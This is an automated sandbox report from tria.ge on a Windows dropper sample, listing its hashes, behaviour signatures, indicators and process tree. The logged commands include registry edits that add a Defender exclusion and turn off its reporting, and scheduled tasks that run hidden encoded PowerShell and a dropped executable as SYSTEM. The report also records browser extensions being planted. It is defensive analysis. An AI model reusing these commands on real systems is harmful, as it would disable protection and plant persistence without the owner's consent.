Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
19/03/2024, 19:00
Static task
static1
Behavioral task
behavioral1
Sample
497f31f97244da648bb5651ab0609e5239c0871e0d1e3b61732d3ce274f976d8.exe
Resource
win10v2004-20240226-en
General
-
Target
497f31f97244da648bb5651ab0609e5239c0871e0d1e3b61732d3ce274f976d8.exe
-
Size
7.5MB
-
MD5
680e0d71b890903dd9f296c9ec6f9323
-
SHA1
3a09a2cf14871474d9c5051b8a9b0adda9628864
-
SHA256
497f31f97244da648bb5651ab0609e5239c0871e0d1e3b61732d3ce274f976d8
-
SHA512
136bd18942e487d6f2e34637c5549f72041619aca25c5ff6173b2e94a742c242ef65de8e4898894f6ae5967eb245fa926a7f6743a8782eba3dc79757771bc39d
-
SSDEEP
196608:91OntenT5ZSWw3qbal0EFaeg4r0XBbTVT4kfb81+fSY+EuRwl:3OteT5gWcQqgXBnVT4kDoOSYmRwl
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 162 3732 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation CwQNhop.exe -
Executes dropped EXE 4 IoCs
pid Process 3228 Install.exe 1876 Install.exe 4900 GXyXFQG.exe 1336 CwQNhop.exe -
Loads dropped DLL 1 IoCs
pid Process 3732 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json CwQNhop.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json CwQNhop.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini CwQNhop.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache CwQNhop.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA CwQNhop.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol CwQNhop.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F335A0F859C450629B87083CAA1DC971 CwQNhop.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA CwQNhop.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2D CwQNhop.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini GXyXFQG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies CwQNhop.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 CwQNhop.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft CwQNhop.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2D CwQNhop.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 CwQNhop.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 CwQNhop.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA CwQNhop.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_A2CFFC3C54D475112D9FC5039EB0095F CwQNhop.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F335A0F859C450629B87083CAA1DC971 CwQNhop.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content CwQNhop.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D4579ED561AFE0AD26F688A8C9A41CC6 CwQNhop.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE CwQNhop.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData CwQNhop.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 CwQNhop.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol GXyXFQG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D4579ED561AFE0AD26F688A8C9A41CC6 CwQNhop.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA CwQNhop.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_A2CFFC3C54D475112D9FC5039EB0095F CwQNhop.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\DyYwGMOhU\pLmqsPN.xml CwQNhop.exe File created C:\Program Files (x86)\NEwrPvSGentU2\fLzyZMhzWtgZu.dll CwQNhop.exe File created C:\Program Files (x86)\NEwrPvSGentU2\pIGhnyV.xml CwQNhop.exe File created C:\Program Files (x86)\iRMzUYCAhkbMC\HzDsrEN.xml CwQNhop.exe File created C:\Program Files (x86)\DyYwGMOhU\LyMztZ.dll CwQNhop.exe File created C:\Program Files (x86)\wqRDBEtPSAXhoJHUBaR\XWaXdbM.xml CwQNhop.exe File created C:\Program Files (x86)\iRMzUYCAhkbMC\bcbZHWU.dll CwQNhop.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi CwQNhop.exe File created C:\Program Files (x86)\oZARwjxMcMUn\tgLSugz.dll CwQNhop.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi CwQNhop.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak CwQNhop.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak CwQNhop.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja CwQNhop.exe File created C:\Program Files (x86)\wqRDBEtPSAXhoJHUBaR\ztowQUw.dll CwQNhop.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bNoYxGgNiGReyhFIfY.job schtasks.exe File created C:\Windows\Tasks\vFsADyudLcNCFLIiL.job schtasks.exe File created C:\Windows\Tasks\DQYxzwqpnFjMWpp.job schtasks.exe File created C:\Windows\Tasks\LPyXfDhiQUyhASpny.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4976 schtasks.exe 1880 schtasks.exe 1824 schtasks.exe 4460 schtasks.exe 3180 schtasks.exe 3356 schtasks.exe 1420 schtasks.exe 5072 schtasks.exe 1216 schtasks.exe 3928 schtasks.exe 4364 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" CwQNhop.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket CwQNhop.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" CwQNhop.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing CwQNhop.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{78362842-0000-0000-0000-d01200000000}\MaxCapacity = "14116" CwQNhop.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" CwQNhop.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{78362842-0000-0000-0000-d01200000000} CwQNhop.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" CwQNhop.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ CwQNhop.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "6" CwQNhop.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{78362842-0000-0000-0000-d01200000000}\NukeOnDelete = "0" CwQNhop.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer CwQNhop.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4176 powershell.EXE 4176 powershell.EXE 4176 powershell.EXE 1484 powershell.exe 1484 powershell.exe 1484 powershell.exe 2908 powershell.exe 2908 powershell.exe 2908 powershell.exe 4744 powershell.EXE 4744 powershell.EXE 4744 powershell.EXE 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe 1336 CwQNhop.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4176 powershell.EXE Token: SeDebugPrivilege 1484 powershell.exe Token: SeDebugPrivilege 2908 powershell.exe Token: SeDebugPrivilege 4744 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3168 wrote to memory of 3228 3168 497f31f97244da648bb5651ab0609e5239c0871e0d1e3b61732d3ce274f976d8.exe 93 PID 3168 wrote to memory of 3228 3168 497f31f97244da648bb5651ab0609e5239c0871e0d1e3b61732d3ce274f976d8.exe 93 PID 3168 wrote to memory of 3228 3168 497f31f97244da648bb5651ab0609e5239c0871e0d1e3b61732d3ce274f976d8.exe 93 PID 3228 wrote to memory of 1876 3228 Install.exe 95 PID 3228 wrote to memory of 1876 3228 Install.exe 95 PID 3228 wrote to memory of 1876 3228 Install.exe 95 PID 1876 wrote to memory of 4192 1876 Install.exe 97 PID 1876 wrote to memory of 4192 1876 Install.exe 97 PID 1876 wrote to memory of 4192 1876 Install.exe 97 PID 1876 wrote to memory of 2020 1876 Install.exe 99 PID 1876 wrote to memory of 2020 1876 Install.exe 99 PID 1876 wrote to memory of 2020 1876 Install.exe 99 PID 4192 wrote to memory of 5020 4192 forfiles.exe 101 PID 4192 wrote to memory of 5020 4192 forfiles.exe 101 PID 4192 wrote to memory of 5020 4192 forfiles.exe 101 PID 2020 wrote to memory of 2100 2020 forfiles.exe 102 PID 2020 wrote to memory of 2100 2020 forfiles.exe 102 PID 2020 wrote to memory of 2100 2020 forfiles.exe 102 PID 5020 wrote to memory of 4864 5020 cmd.exe 103 PID 5020 wrote to memory of 4864 5020 cmd.exe 103 PID 5020 wrote to memory of 4864 5020 cmd.exe 103 PID 2100 wrote to memory of 2392 2100 cmd.exe 104 PID 2100 wrote to memory of 2392 2100 cmd.exe 104 PID 2100 wrote to memory of 2392 2100 cmd.exe 104 PID 2100 wrote to memory of 2708 2100 cmd.exe 105 PID 2100 wrote to memory of 2708 2100 cmd.exe 105 PID 2100 wrote to memory of 2708 2100 cmd.exe 105 PID 5020 wrote to memory of 524 5020 cmd.exe 106 PID 5020 wrote to memory of 524 5020 cmd.exe 106 PID 5020 wrote to memory of 524 5020 cmd.exe 106 PID 1876 wrote to memory of 1420 1876 Install.exe 107 PID 1876 wrote to memory of 1420 1876 Install.exe 107 PID 1876 wrote to memory of 1420 1876 Install.exe 107 PID 1876 wrote to memory of 3328 1876 Install.exe 109 PID 1876 wrote to memory of 3328 1876 Install.exe 109 PID 1876 wrote to memory of 3328 1876 Install.exe 109 PID 4176 wrote to memory of 4868 4176 powershell.EXE 113 PID 4176 wrote to memory of 4868 4176 powershell.EXE 113 PID 1876 wrote to memory of 3928 1876 Install.exe 124 PID 1876 wrote to memory of 3928 1876 Install.exe 124 PID 1876 wrote to memory of 3928 1876 Install.exe 124 PID 1876 wrote to memory of 4976 1876 Install.exe 126 PID 1876 wrote to memory of 4976 1876 Install.exe 126 PID 1876 wrote to memory of 4976 1876 Install.exe 126 PID 4900 wrote to memory of 1484 4900 GXyXFQG.exe 132 PID 4900 wrote to memory of 1484 4900 GXyXFQG.exe 132 PID 4900 wrote to memory of 1484 4900 GXyXFQG.exe 132 PID 1484 wrote to memory of 4468 1484 powershell.exe 134 PID 1484 wrote to memory of 4468 1484 powershell.exe 134 PID 1484 wrote to memory of 4468 1484 powershell.exe 134 PID 4468 wrote to memory of 4020 4468 cmd.exe 135 PID 4468 wrote to memory of 4020 4468 cmd.exe 135 PID 4468 wrote to memory of 4020 4468 cmd.exe 135 PID 1484 wrote to memory of 1364 1484 powershell.exe 136 PID 1484 wrote to memory of 1364 1484 powershell.exe 136 PID 1484 wrote to memory of 1364 1484 powershell.exe 136 PID 1484 wrote to memory of 3888 1484 powershell.exe 137 PID 1484 wrote to memory of 3888 1484 powershell.exe 137 PID 1484 wrote to memory of 3888 1484 powershell.exe 137 PID 1484 wrote to memory of 1588 1484 powershell.exe 138 PID 1484 wrote to memory of 1588 1484 powershell.exe 138 PID 1484 wrote to memory of 1588 1484 powershell.exe 138 PID 1484 wrote to memory of 624 1484 powershell.exe 139 PID 1484 wrote to memory of 624 1484 powershell.exe 139
Processes
-
C:\Users\Admin\AppData\Local\Temp\497f31f97244da648bb5651ab0609e5239c0871e0d1e3b61732d3ce274f976d8.exe"C:\Users\Admin\AppData\Local\Temp\497f31f97244da648bb5651ab0609e5239c0871e0d1e3b61732d3ce274f976d8.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Users\Admin\AppData\Local\Temp\7zS34CB.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Users\Admin\AppData\Local\Temp\7zS36FE.tmp\Install.exe.\Install.exe /BQLdidcPk "385118" /S3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:5020 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:4864
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:524
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2100 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:2392
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2708
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gySZeddoc" /SC once /ST 17:36:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1420
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gySZeddoc"4⤵PID:3328
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gySZeddoc"4⤵PID:3928
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bNoYxGgNiGReyhFIfY" /SC once /ST 19:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qeOxabDhDvCCKUygJ\MfJxEgkARsuSvOa\GXyXFQG.exe\" Qp /hqsite_idHVU 385118 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4976
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4176 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4868
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2300
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2044
-
C:\Users\Admin\AppData\Local\Temp\qeOxabDhDvCCKUygJ\MfJxEgkARsuSvOa\GXyXFQG.exeC:\Users\Admin\AppData\Local\Temp\qeOxabDhDvCCKUygJ\MfJxEgkARsuSvOa\GXyXFQG.exe Qp /hqsite_idHVU 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
